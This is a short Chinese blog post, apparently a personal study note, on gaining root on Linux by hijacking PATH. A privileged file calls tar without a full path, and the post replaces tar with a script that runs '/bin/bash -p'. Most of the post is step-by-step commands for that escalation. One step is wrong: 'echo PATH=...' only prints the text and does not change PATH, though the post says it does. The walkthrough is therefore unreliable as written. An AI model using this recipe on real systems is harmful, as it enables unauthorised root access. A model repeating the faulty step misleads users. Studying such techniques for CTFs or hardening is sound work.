有些文件可执行,且其中包含一个命令去调用另一个程序,而被调用的程序并没用路径引用,那么可以通过改系统路径的方式来提权
例如有个file文件
strings file
得
tar xxxxx xxxxx /bin/vim xxx xxx
那么其中,可以通过tar来提权
操作
1.先移动到另一个路径下
例:cd /home/jhinjax
2.将该路径添加到系统PATH里
echo PATH=/home/jhinjax:$PATH
此时查看系统路径的话可以看到该路径已被添加
echo $PATH /home/jhinjax:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
3.在该路径下创建一个相同的程序
echo "/bin/bash -p" > tar
加执行权限
chmod +x tar
4.最后回到file存在的路径,运行file即可变为root
./file
标签:bin,tar,路径,提权,引用,file,PATH,usr From: https://www.cnblogs.com/jhinjax/p/17080193.html